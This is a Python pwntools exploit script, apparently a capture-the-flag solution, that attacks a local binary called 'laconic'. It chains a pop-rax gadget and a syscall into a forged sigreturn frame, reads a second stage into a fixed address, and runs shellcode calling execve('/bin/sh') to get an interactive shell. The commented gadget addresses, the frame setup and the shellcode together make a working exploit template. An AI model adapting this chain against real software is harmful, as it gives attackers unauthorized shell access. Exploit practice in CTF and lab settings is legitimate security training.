#!/usr/bin/python3
from pwn import *

# Binding context.binary makes asm() and SigreturnFrame() use the target's
# arch/ABI. checksec output is suppressed here, so the binary's mitigation
# summary (NX, PIE, canary, RELRO) has to be checked separately.
context.binary = target = ELF("./laconic", checksec=False)
io = process()


def send_raw(data: bytes) -> None:
    """Write *data* to the process exactly as given (no newline appended)."""
    io.send(data)


# Gadget addresses used by the original script. They are fixed constants, so
# the chain only holds if the binary is loaded at a fixed address (no PIE) —
# TODO confirm with checksec.
POP_RAX = 0x43018  # named "pop_rax" in the original; not verified here
SYSCALL = 0x43015  # address of a syscall instruction

# Register state that rt_sigreturn will restore: rax=0 (read on x86-64),
# rdi=0 (stdin), rsi=destination address, rdx=0xff (length), rip=syscall gadget.
# A seccomp policy denying rt_sigreturn, or a non-executable destination
# page, would break this step — neither is verified from this script alone.
sigframe = SigreturnFrame()
sigframe.rax = 0
sigframe.rdi = 0
sigframe.rsi = 0x43005
sigframe.rdx = 0xff
sigframe.rip = SYSCALL

# Stage 2, delivered by the read() above: execve(rdi, NULL, NULL) with rdi
# expected to point 32 bytes past rsi, where the "/bin/sh" string is appended.
# 59 is execve on x86-64.
stage2_asm = """
    lea rdi, [rsi+32]
    xor rsi, rsi
    xor rdx, rdx
    mov al, 59
    syscall
"""
stage2 = asm(stage2_asm) + b"/bin/sh\0"

# Payload layout: 8 bytes of filler, then pop rax / 0xf (rt_sigreturn on
# x86-64) / syscall, the forged frame, and the second stage.
payload = b"".join(
    [
        b"A" * 8,
        p64(POP_RAX),
        p64(0xF),
        p64(SYSCALL),
        bytes(sigframe),
        stage2,
    ]
)

send_raw(payload)
io.interactive()